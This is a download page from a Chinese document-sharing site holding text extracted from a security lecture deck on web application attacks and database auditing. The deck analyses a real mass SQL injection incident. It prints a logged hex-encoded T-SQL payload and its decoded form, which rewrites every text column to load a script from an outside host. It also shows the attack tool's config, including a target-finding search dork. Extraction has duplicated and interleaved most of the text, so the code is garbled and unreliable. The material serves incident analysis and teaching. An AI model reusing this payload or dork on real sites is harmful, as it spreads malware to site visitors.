数据库安全审计课件.ppt
- 【下载声明】
1. 本站全部试题类文档,若标题没写含答案,则无答案;标题注明含答案的文档,主观题也可能无答案。请谨慎下单,一旦售出,不予退换。
2. 本站全部PPT文档均不含视频和音频,PPT中出现的音频或视频标识(或文字)仅表示流程,实际无音频或视频文件。请谨慎下单,一旦售出,不予退换。
3. 本页资料《数据库安全审计课件.ppt》由用户(三亚风情)主动上传,其收益全归该用户。163文库仅提供信息存储空间,仅对该用户上传内容的表现方式做保护处理,对上传内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(点击联系客服),我们立即给予删除!
4. 请根据预览情况,自愿下载本文。本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
5. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007及以上版本和PDF阅读器,压缩文件请下载最新的WinRAR软件解压。
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 数据库 安全 审计 课件
- 资源描述:
-
1、Web Application Security and Web Application Security and Database Audit MiscsDatabase Audit MiscsDBAPPSecurity IncDBAPPSecurity Inc杭州安恒信息技术有限公司杭州安恒信息技术有限公司FrankdbappSFrankdbappSFrank.F主讲人主讲人Frank.FanFrank.Fan范渊范渊杭州安恒信息技术有限公司杭州安恒信息技术有限公司DBAPPSecurity IncDBAPPSecurity IncFounder and CTOFounder and CT
2、O毕业于美国加州大学计算机科学方向硅谷国际著名安全公司从事十多年的技术研发和项目管理对应用安全、数据库安全和审计、compliance(如SOX,PCI,ISO17799/27001)有着非常资深经验第一个登上全球最权威黑帽子安全大会演讲的中国人CISSP,CISA,GCIH,GCIAOWASP中国分会副会长2008北京奥组委安全组成员浙江省信息安全协会安全服务委员会负责人本期要点:本期要点:FWebWeb应用安全挑战和分析应用安全挑战和分析F数据库审计数据库审计 安全风险安全风险+管理风险管理风险 -审计审计主要内容主要内容F公司简介公司简介F数据库安全审计概念数据库安全审计概念F各类规范要
3、求和数据库各类规范要求和数据库审计系统需求分析审计系统需求分析F明御数据库审计与风险控制系统明御数据库审计与风险控制系统F案例分析案例分析F小结小结2008北京奥组委安全产品和服务提供商北京奥组委安全产品和服务提供商作为2008北京奥组委安全产品和服务提供商,2008年9月安恒信息被2008北京奥运会组委会授予08奥运安全保障杰出贡献奖。Many Incident Handling Support安恒机密.|7黑客产业链黑客产业链入侵者入侵者入侵企业入侵企业服务器服务器窃取机密信息窃取机密信息(图纸、财务报表图纸、财务报表等)等)出售出售收费传播流氓软件获取金获取金钱钱拒绝服务攻击发送垃圾邮件
4、批量入批量入侵网站侵网站洗钱洗钱主动攻击勒索网站受雇攻击收取佣金安恒机密.|8F总共检测网站近总共检测网站近700700家家F90%90%网站存在严重安全隐患网站存在严重安全隐患F部分网站已经被挂马或被黑客控制部分网站已经被挂马或被黑客控制AgendaAgendaFMass Injection Attack Tool RevealedMass Injection Attack Tool RevealedFPHP Backdoor TipsPHP Backdoor TipsFSome hacking tips about phpmydaminSome hacking tips about php
5、mydamin9Mass Injection Tool RevealedMass Injection Tool RevealedFHow did We find it?How did We find it?From a Bot Machine during Incident Handling From a Bot Machine during Incident Handling10Real case in incident handling!Real case in incident handling!F2008-05-13 00:28:25 W3SVC628249937 22.1.1.11
6、POST/news_default.asp 2008-05-13 00:28:25 W3SVC628249937 22.1.1.11 POST/news_default.asp tid=117;DECLARE%20S%20NVARCHAR(4000);SET%20S=CAST(0 x4400450043004C0041005200450020004000tid=117;DECLARE%20S%20NVARCHAR(4000);SET%20S=CAST(0 x4400450043004C0041005200450020004000540020007600610072006300680061007
7、200280032003500350029002C00400043002000760061007200630068540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0000610072002800320035003500290020004400450043004C004100520045002
8、0005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C0065006343007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300007
9、400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200
10、061002E00690064003D0062002E0069006400200061006E0064002000006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E007800740079007061002E00780074007900700065003D00270075002700200061006E006400200
11、0280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F00720020000065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D620
12、02E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720000310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004
13、500580054002000460052004F004D00200020005400610062006C006520004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C00400043002000570048004900005F0043007500720073006F007200200049004E0054004F002000400054002
14、C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D003000290020004200454C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B0040005400004
15、70049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00282B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280
16、076006100720063006800610072002C005B0027002B00400043002B000063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D006800740074007027005D00290029002B00270027003C007300630072006900700074002000730
17、0720063003D0068007400740070003A002F002F007700770077002E006B0069006C006C0077006F00770031002E0063006E002F0067002E006A00003A002F002F007700770077002E006B0069006C006C0077006F00770031002E0063006E002F0067002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045730
18、03E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200000580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004
19、0004300200045004E004400200043004C004F0053004500200054006149004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020000062006C0065005F0043007500720073006F00720020004400450041004C004
20、C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000);EXEC(S);-80-5400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000);EXEC(S);-80-204.13.70.223 Mozilla/3.0+(compatible;+Indy+Library)200 0 0204.13.70.223 Mozilla/3.0+(compatible;+Indy+Libr
21、ary)200 0 011Real contentReal contentFDECLARE T varchar(255),C varchar(255)DECLARE DECLARE T varchar(255),C varchar(255)DECLARE Table_Cursor CURSOR FOR select a.name,b.name from Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and sysobjects a,syscolumns b
22、where a.id=b.id and a.xtype=u and(b.xtype=99 or b.xtype=35 or a.xtype=u and(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)OPEN Table_Cursor FETCH b.xtype=231 or b.xtype=167)OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO T,C NEXT FROM Table_Cursor INTO T,C WHILE(FETCH_STATUS=0)BEGIN exe
23、c(update+T+WHILE(FETCH_STATUS=0)BEGIN exec(update+T+set set+C+=rtrim(convert(varchar,+C+)+script+C+=rtrim(convert(varchar,+C+)+)FETCH src=http:/ NEXT FROM Table_Cursor INTO T,C END CLOSE NEXT FROM Table_Cursor INTO T,C END CLOSE Table_Cursor DEALLOCATE Table_CursorTable_Cursor DEALLOCATE Table_Curso
24、r12Key part:Key part:Fscript src=http:/ Injection Tool RevealedMass Injection Tool Revealed14Mass Injection Tool RevealedMass Injection Tool Revealed15Mass Injection Tool-Config.iniMass Injection Tool-Config.iniFinitinitFedkey=inurl:(.aspx?-(gov)edkey=inurl:(.aspx?-(gov)自动产生自动产生 Franklimit=1000000ra
25、nklimit=1000000Fcipin=50cipin=50Ftimeout=20timeout=20Fprocess=1process=1Fretry=3retry=3Fthread=88thread=88Fbufferlength=10bufferlength=10Fcpu=115cpu=115Fsellang=0sellang=0Fscanmode=0scanmode=0Fchkbox1=1chkbox1=1Fchkbox2=0chkbox2=0Fchkbox3=1chkbox3=1Fchkbox4=0chkbox4=0Fchkbox5=1chkbox5=1Fchkbox6=0chk
展开阅读全文